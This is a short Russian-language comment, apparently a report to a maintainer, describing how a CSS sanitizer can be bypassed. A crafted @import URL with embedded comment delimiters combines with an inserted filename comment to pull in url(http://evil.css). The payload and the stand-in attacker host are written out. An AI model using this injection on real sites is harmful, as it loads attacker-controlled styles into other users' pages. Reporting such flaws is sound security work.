@morr, всё ещё можно делать прямой import

благодаря вставляемому в конечный код закомментированному названию импортированного css

/* imported.css */

можно обмануть чистильщика

/* imported.css*/@import/* */ url(http://evil.css);

в начало импортируемого css файла вставляется строка url(http://evil.css);
в редакторе к ссылке на импортируемый css добавляется */@import//*/*/*
в итоге находящийся в редакторе

@import url(https://imported.css*/@import//*/*/*);

превращается в

/* imported.css*/@import/* */

за которым следует

url(http://evil.css);

из импортированного файла

---

будет ли поддерживаться import находящийся внутри импортируемого css ?